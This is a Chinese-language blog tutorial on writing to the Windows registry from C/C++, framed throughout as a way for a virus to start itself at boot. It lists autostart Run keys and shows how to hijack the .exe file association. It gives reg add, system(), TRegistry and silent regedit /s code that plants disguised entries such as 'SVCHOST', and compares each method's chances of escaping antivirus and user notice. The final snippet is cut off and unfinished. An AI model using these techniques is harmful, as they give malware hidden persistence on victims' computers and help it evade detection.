C\C++修改windows注册表

果果、

（三个程序system()调用可以查看帮助，有很详细的说明；C++的函数没试验；spawnl()函数有点像是Linux下的exec().）　　可以用于病毒开机自启动的注册表位置：
　　[HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
　　[HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices]
　　[HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce]
　　[HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce]
　　[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
　　[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce]
　　[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices]
　　以上只是默认运行的部分注册表位置，其实还可以在系统启动外客(shell explorer.exe)后添加病毒路径等方法，同样可以实现通过注册表开机自动运行。
　　2.关联文件类型
　　在注册表HKEY_CLASS_ROOT下可以更改文件类型的默认启动程序，比如更改EXE文件的启动程序为你写的病毒，那么每当运行exe程序时，病毒将替代程序运行
　　例：
　　到注册表HKEY_CLASS_ROOT\\exefile\\shell\\open\\command下，修改“默认”修改为c:\\windows\\svchost.exe \"%1\" %*，那么以后运行.exe文件时只会运行c:\\windows\\svchost.exe
　　3.程序修改注册表的方法：
　　(1)使用REG命令添加修改注册表：
　　REG命令使用方法具体可以在命令提示符中输入REG /?和通过参阅Windows命令帮助查看
　　主要格式：
　　REG Operation [Parameter List]
　　Operation   [ QUERY    | ADD     | DELETE   | COPY     |
　　SAVE     | LOAD    | UNLOAD   | RESTORE |
　　COMPARE | EXPORT | IMPORT ]
　　例：向HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run中添加名为SVCHOST的键值，键值内容为C:\\Windows\\system\\SVCHOST.exe
　　reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f
　　调用reg命令的方法主要有两中，一种是使用C语言中的system函数，另一种是使用C语言中的spawn类函数（如函数spawnl）。具体system和spawnl使用方法请参见其它资料,这里仅举一例：
　　例：用system函数通过reg命令向HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run中添加名为SVCHOST的键值，键值内容为C:\\Windows\\system\\SVCHOST.exe
　　system("reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\/v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f");
　　评论与小结：使用REG命令添加注册表可以达到直接调用系统命令（工具）来修改注册表的目的，如果被杀毒软件拦截也只会显示修改操作的发出来自C:\\WINDOWS\\system32\\reg.exe，使病毒不容易被寻找到。但由于REG命令属于控制台命令，因此调用时有黑色的控制台出现，是病毒的征兆被感染用户发现，不利于病毒隐藏。
　　(2)使用WindowsAPI添加修改注册表
　　WindowsAPI为我们提供了大约25个函数。他提供了对注册表的读取，写入，删除，以及打开注册表及键值时所有函数这些函数有：
　　RegCloseKey
　　RegConnectRegistry
　　RegCreateKey
　　RegCreateKeyEx
　　RegDeleteKey
　　RegDeleteVale
　　RegEnumKey
　　RegFlushKey
　　RegGetKeySecurity(Windows9X不适用)
　　RegLoadKey
　　RegNotifyChangeKeyValue(Windows9X不适用)
　　RegOpenKey
　　RegOpenKeyEx
　　RegQueryInfoKey
　　RegQueryValue
　　RegQueryValueEx
　　RegReplaceKey
　　RegRestoreKey(Windows9X不适用)
　　RegSaveKey
　　RegSetKeySecurity(Windows9X不适用)
　　RegSetValue
　　RegSetValueEx
　　RegUnLoadKey
　　等，函数的使用需要在32位C编译器下调用windows.h文件，同(1)中一样，具体函数的使用方法请参见其它资料,这里仅举一例.
　　例:通过WindowsAPI向HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run中添加名为SVCHOST的键值，键值内容为C:\\Windows\\system\\SVCHOST.exe
　　TRegistry* Registry;
　　Registry=new TRegistry();
　　Registry->RootKey=HKEY_LOCAL_MACHINE;
　　Registry->OpenKey(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",FALSE);
　　Registry->WriteString(\"SVCHOST\",\"C:\\\\Windows\\\\system\\\\SVCHOST.exe\");WriteString()
　　Registry->CloseKey();
　　评论与小结：使用WindowsAPI添加注册表可以达到直接无须调用系统命令（工具）就可以修改注册表的目的，但如果被杀毒软件拦截会显示修改操作来自的病毒体文件所在的路径，使病毒容易被寻找到。但由于WindowsAPI可以“悄悄”的完成修改，在前台没有任何显示，因此调用时如果未被拦截，很难被感染用户发觉，利于病毒隐藏。
　　(3)使用REGEDIT添加修改注册表
　　REGEDIT就是注册表编辑器，但它其实有一个/s的参数，只要调用regedit /s 注册表文件，就可以在后台无提示的修改注册表。同样需要用spawnl函数调用它。
　　例：通过spawnl函数调用regedit向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为wjview32的键值，键值内容为C:\windows\wjview32.com /s
　　char*regadd={"REGEDIT4\n\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32\"=\"C:\\windows\\wjview32.com/s\""};
　　FILE *output;
　　if((output=fopen("$$$$$","w"))!=NULL)
　　{
　　fprintf(output,regadd);
　　fclose(output);
　　spawnl(1,"c:\\\\windows\\\\regedit.exe"," /s $$$$$",NULL);
　　出处：http://hi.baidu.com/honch4/blog/item/49f686e85dbaf635b90e2dca.html